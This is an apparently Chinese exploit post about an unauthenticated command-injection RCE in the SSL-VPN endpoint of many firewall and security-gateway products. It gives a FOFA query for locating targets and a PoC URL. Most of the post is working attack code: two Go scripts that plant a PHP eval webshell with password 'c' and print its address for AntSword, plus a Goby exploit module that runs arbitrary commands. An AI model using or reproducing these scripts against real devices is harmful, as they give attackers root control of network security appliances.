多个防火墙产品RCE

多个防火墙产品RCE

影响版本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
H3C-下一代防火墙
安恒信息-明御安全网关
MAiPU-安全网关
D_Link-下一代防火墙
HUAWEI-公司产品
迈普通信技术股份有限公司安全网关
博达通信-下一代防火墙
任天行网络安全管理系统\安全审计系统
安博通应用网关
烽火网络安全审计
瑞斯康达科技发展股份有限公司安全路由器
任子行网络安全审计系统
绿盟安全审计系统
深圳市鑫塔科技有限公司第二代防火墙

fofa

1
body="/webui/images/default/default/alert_close.jpg"

poc

1
/sslvpn/sslvpn_client.php?client=logoImg&img=%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt

批量利用脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
package main

import (
    "crypto/tls"
    "fmt"
    "github.com/fatih/color"
    "github.com/hpifu/go-kit/hflag"
    "github.com/imroc/req/v3"
    "github.com/thanhpk/randstr"
    "net/http"
    "strings"
    "time"
)

var reqHeader = map[string]string{
    "User-Agent":      "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36",
    "Accept":          "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
    "Accept-Encoding": "gzip, deflate, br",
    "Accept-Language": "zh-CN,zh-TW;q=0.9,zh;q=0.8",
    "Connection":      "close",
}

func main() {
    hflag.AddFlag("target", "SSLVPN系统地址", hflag.Required(), hflag.Shorthand("t"))
    if err2 := hflag.Parse(); err2 != nil {
       fmt.Println(hflag.Usage())
       return
    }
    targetHost := hflag.GetString("target")
    filename := randstr.Hex(8) + ".php"
    vulPath := "/sslvpn/sslvpn_client.php?client=logoImg&img=/tmp|echo%20PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2MnXSk7Pz4=|base64%20-d|tee%20/usr/local/webui/sslvpn/" + filename
    fullURL := strings.Replace(targetHost+vulPath, "//ss", "/ss", 1)
    cli := reqCli()
    get, err := cli.R().Get(fullURL)
    if err != nil {
       fmt.Println(err)
       return
    }
    defer func() {
       _ = get.Body.Close()
    }()
    shellURL := strings.Replace(targetHost+"/sslvpn/"+filename, "//ss", "/ss", 1)

    if get.StatusCode == http.StatusOK {
       if strings.Contains(get.String(), "|base64 -d|tee /usr/local/webui/sslvpn/") {
         fmt.Println(color.RedString("\nShell URL Is : %s\nShell Pass is : c\n", shellURL))
         return
       }
    }
    fmt.Println(color.GreenString("\n%s", "站点安全不存在漏洞"))
    return
}

func reqCli() *req.Client {
    cli := req.C()
    for k, v := range reqHeader {
       cli.SetCommonHeader(k, v)
    }
    cli.SetTimeout(time.Second * 10)
    cli.SetTLSFingerprintSafari()
    cli.SetAutoDecodeAllContentType()
    cli.TLSClientConfig = &tls.Config{InsecureSkipVerify: true,
       MinVersion: tls.VersionTLS10,
       MaxVersion: tls.VersionTLS13}
    return cli
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
package exploits

import (
	"git.gobies.org/goby/goscanner/goutils"
)

func init() {
	expJson := `{
    "Name": "Multiple Security Gateway Frontend RCE",
    "Description": "A 0day RCE in multiple security gateway",
    "Product": "Multiple Security Gateway",
    "Homepage": "https://gobies.org/",
    "DisclosureDate": "2021-05-30",
    "Author": "gobysec@gmail.com",
    "GobyQuery": "header=\"Set-Cookie: USGSESSID\"",
    "Level": "3",
    "Impact": "<p>The attackers are allowed to execute any code with root privilege without any login crenditials.</p>",
    "Recommendation": "<p>1. For security devices, it's not recommended to make them accessable from Internet.</p><p>2. You should contact the product suppliance for help.</p>",
    "References": [
        "https://gobies.org/"
    ],
    "HasExp": true,
    "ExpParams": [
        {
            "name": "cmd",
            "type": "input",
            "value": "cat /etc/hosts ",
            "show": "Enter the command you want to execute"
        }
    ],
    "ExpTips": {
        "Type": "",
        "Content": ""
    },
    "ScanSteps": [
        "AND",
        {
            "Request": {
                "method": "GET",
                "uri": "/sslvpn/sslvpn_client.php",
                "follow_redirect": true,
                "header": {},
                "data_type": "text",
                "data": ""
            },
            "ResponseTest": {
                "type": "group",
                "operation": "AND",
                "checks": [
                    {
                        "type": "item",
                        "variable": "$code",
                        "operation": "==",
                        "value": "200",
                        "bz": ""
                    }
                ]
            },
            "SetVariable": []
        },
        {
            "Request": {
                "method": "GET",
                "uri": "/sslvpn/sslvpn_client.php?client=logoImg&img=%36%64%72%63%64%66%73%33%34%63%31%68%20%2f%74%6d%70%20%7c%7c%20%63%70%20%2f%65%74%63%2f%68%6f%73%74%73%20%2f%75%73%72%2f%6c%6f%63%61%6c%2f%77%65%62%75%69%2f%77%65%62%75%69%2f%69%6d%61%67%65%73%2f%62%61%73%69%63%2f%6c%6f%67%69%6e%2f%6d%61%69%6e%5f%6c%6f%67%6f%32%31%2e%74%78%74%20%7c%7c%20%6c%73",
                "follow_redirect": true,
                "header": {
                    "Connection": "close",
                    "Upgrade-Insecure-Requests": "1",
                    "User-Agent": "Mozilla/5.0",
                    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
                    "Sec-Fetch-Site": "same-origin",
                    "Sec-Fetch-Mode": "navigate",
                    "Sec-Fetch-User": "?1",
                    "Sec-Fetch-Dest": "iframe",
                    "Referer": "{{{hostinfo}}}",
                    "Accept-Encoding": "gzip, deflate",
                    "Accept-Language": "zh-CN,zh;q=0.9",
                    "Content-Type": "application/x-www-form-urlencoded"
                },
                "data_type": "text",
                "data": ""
            },
            "ResponseTest": {
                "type": "group",
                "operation": "AND",
                "checks": [
                    {
                        "type": "item",
                        "variable": "$code",
                        "operation": "==",
                        "value": "200",
                        "bz": ""
                    },
                    {
                        "type": "item",
                        "variable": "$body",
                        "operation": "contains",
                        "value": "6drcdfs34c1h",
                        "bz": "random string"
                    }
                ]
            },
            "SetVariable": []
        },
        {
            "Request": {
                "method": "GET",
                "uri": "/webui/images/basic/login/main_logo21.txt",
                "follow_redirect": true,
                "header": {
                    "Connection": "close",
                    "Upgrade-Insecure-Requests": "1",
                    "User-Agent": "Mozilla/5.0",
                    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
                    "Sec-Fetch-Site": "same-origin",
                    "Sec-Fetch-Mode": "navigate",
                    "Sec-Fetch-User": "?1",
                    "Sec-Fetch-Dest": "iframe",
                    "Referer": "{{{hostinfo}}}",
                    "Accept-Encoding": "gzip, deflate",
                    "Accept-Language": "zh-CN,zh;q=0.9",
                    "Content-Type": "application/x-www-form-urlencoded"
                },
                "data_type": "text",
                "data": ""
            },
            "ResponseTest": {
                "type": "group",
                "operation": "AND",
                "checks": [
                    {
                        "type": "item",
                        "variable": "$code",
                        "operation": "==",
                        "value": "200",
                        "bz": ""
                    },
                    {
                        "type": "item",
                        "variable": "$body",
                        "operation": "contains",
                        "value": "localhost",
                        "bz": ""
                    }
                ]
            },
            "SetVariable": []
        }
    ],
    "ExploitSteps": [
        "AND",
        {
            "Request": {
                "method": "GET",
                "uri": "/sslvpn/sslvpn_client.php",
                "follow_redirect": true,
                "header": {},
                "data_type": "text",
                "data": ""
            },
            "ResponseTest": {
                "type": "group",
                "operation": "AND",
                "checks": [
                    {
                        "type": "item",
                        "variable": "$code",
                        "operation": "==",
                        "value": "200",
                        "bz": ""
                    }
                ]
            },
            "SetVariable": []
        },
        {
            "Request": {
                "method": "GET",
                "set_variable": [
                    "cmdUrlEncoded|cmd|url_encode|{{{cmd}}}"
                ],
                "uri": "/sslvpn/sslvpn_client.php?client=logoImg&img=%36%64%72%63%64%66%73%33%34%63%31%68%20%2f%74%6d%70%20%7c%7c%20%20{{{cmdUrlEncoded}}}%20%7c%20%74%65%65%20%2f%65%74%63%2f%68%6f%73%74%73%20%2f%75%73%72%2f%6c%6f%63%61%6c%2f%77%65%62%75%69%2f%77%65%62%75%69%2f%69%6d%61%67%65%73%2f%62%61%73%69%63%2f%6c%6f%67%69%6e%2f%6d%61%69%6e%5f%6c%6f%67%6f%32%31%2e%74%78%74%20%7c%7c%20%6c%73",
                "follow_redirect": true,
                "header": {
                    "Connection": "close",
                    "Upgrade-Insecure-Requests": "1",
                    "User-Agent": "Mozilla/5.0",
                    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
                    "Sec-Fetch-Site": "same-origin",
                    "Sec-Fetch-Mode": "navigate",
                    "Sec-Fetch-User": "?1",
                    "Sec-Fetch-Dest": "iframe",
                    "Referer": "{{{hostinfo}}}",
                    "Accept-Encoding": "gzip, deflate",
                    "Accept-Language": "zh-CN,zh;q=0.9",
                    "Content-Type": "application/x-www-form-urlencoded"
                },
                "data_type": "text",
                "data": ""
            },
            "ResponseTest": {
                "type": "group",
                "operation": "AND",
                "checks": [
                    {
                        "type": "item",
                        "variable": "$code",
                        "operation": "==",
                        "value": "200",
                        "bz": ""
                    },
                    {
                        "type": "item",
                        "variable": "$body",
                        "operation": "contains",
                        "value": "6drcdfs34c1h",
                        "bz": "random string"
                    }
                ]
            },
            "SetVariable": []
        },
        {
            "Request": {
                "method": "GET",
                "uri": "/webui/images/basic/login/main_logo21.txt",
                "follow_redirect": true,
                "header": {
                    "Connection": "close",
                    "Upgrade-Insecure-Requests": "1",
                    "User-Agent": "Mozilla/5.0",
                    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
                    "Sec-Fetch-Site": "same-origin",
                    "Sec-Fetch-Mode": "navigate",
                    "Sec-Fetch-User": "?1",
                    "Sec-Fetch-Dest": "iframe",
                    "Referer": "{{{hostinfo}}}",
                    "Accept-Encoding": "gzip, deflate",
                    "Accept-Language": "zh-CN,zh;q=0.9",
                    "Content-Type": "application/x-www-form-urlencoded"
                },
                "data_type": "text",
                "data": ""
            },
            "ResponseTest": {
                "type": "group",
                "operation": "AND",
                "checks": [
                    {
                        "type": "item",
                        "variable": "$code",
                        "operation": "==",
                        "value": "200",
                        "bz": ""
                    }
                ]
            },
            "SetVariable": [
                "output|lastbody"
            ]
        }
    ],
    "Tags": [
        "RCE",
        "0day"
    ],
    "CVEIDs": null,
    "CVSSScore": "0.0",
    "AttackSurfaces": {
        "Application": null,
        "Support": null,
        "Service": null,
        "System": null,
        "Hardware": null
    },
    "PocId": "6807"
}`

	ExpManager.AddExploit(NewExploit(
		goutils.GetFileName(),
		expJson,
		nil,
		nil,
	))
}

另外一个点

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
package main

import (
        "crypto/tls"
        "fmt"
        "github.com/fatih/color"
        "github.com/hpifu/go-kit/hflag"
        "github.com/imroc/req/v3"
        "github.com/liushuochen/gotable"
        "github.com/liushuochen/gotable/table"
        "github.com/thanhpk/randstr"
        "net/http"
        "os"
        "strings"
        "time"
)

func main() {
        now := time.Now()
        host, addr := getUserParams()
        exploit(host, addr)
        fmt.Println(color.GreenString("Total Use Time : %s\n", time.Since(now).String()))
}
func httpReqClient() *req.Client {
        var reqHeader = map[string]string{
                "User-Agent":      "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36",
                "Accept":          "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
                "Accept-Encoding": "gzip, deflate, br",
                "Accept-Language": "zh-CN,zh-TW;q=0.9,zh;q=0.8",
                "Connection":      "close",
        }
        cli := req.C()
        for reqHeaderName, reqHeaderValue := range reqHeader {
                cli.SetCommonHeader(reqHeaderName, reqHeaderValue)
        }
        cli.EnableForceHTTP1()
        cli.SetTLSFingerprintSafari()
        cli.SetTimeout(time.Second * 15)
        cli.SetRedirectPolicy(req.NoRedirectPolicy())
        cli.SetAutoDecodeAllContentType()
        cli.TLSClientConfig = &tls.Config{InsecureSkipVerify: true, MinVersion: tls.VersionTLS10, MaxVersion: tls.VersionTLS13}
        return cli
}

func getUserParams() (host, proxyAddr string) {
        hflag.AddFlag("target", "目标地址", hflag.Required(), hflag.Shorthand("t"))
        hflag.AddFlag("proxy", "代理地址", hflag.Shorthand("p"))
        if err := hflag.Parse(); err != nil {
                fmt.Println(color.RedString("%s", hflag.Usage()))
                os.Exit(1)
        }
        target := hflag.GetString("target")
        proxyString := hflag.GetString("proxy")
        return target, proxyString
}

func randFile() string {
        filename := randstr.Hex(8)
        return filename
}
func fmtTable() *table.Table {
        tab, _ := gotable.Create(color.GreenString("%s", "Shell连接工具"), color.RedString("%s", "Shell连接地址"), color.BlueString("%s", "Shell连接密码"))
        return tab
}

func exploit(t, p string) {
        filename := randFile() + ".php"
        vulPath := "/sslvpn/sk403.php?client=logoImg&img=/tmp|echo%20PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2MnXSk7Pz4=|base64%20-d|tee%20/usr/local/webui/sslvpn/" + filename
        fullURL := strings.Replace(t+vulPath, "//ss", "/ss", 1)
        client := httpReqClient()
        if p != "" {
                client.SetProxyURL(p)
        }
        get, err := client.R().Get(fullURL)
        if err != nil {
                fmt.Println(err)
        }
        defer func() {
                _ = get.Body.Close()
        }()
        ShellURL := strings.Replace(t+"/sslvpn/"+filename, "//ss", "/ss", 1)
        if get.StatusCode == http.StatusOK {
                if strings.Contains(get.String(), "/usr/local/webui/sslvpn/") {
                        t2 := fmtTable()
                        _ = t2.AddRow([]string{
                                "AntSword", ShellURL, "c",
                        })
                        fmt.Println(t2)
                        return
                }
        } else {
                fmt.Println(color.RedString("%s", "站点不存在漏洞,安全的很"))
                return
        }
}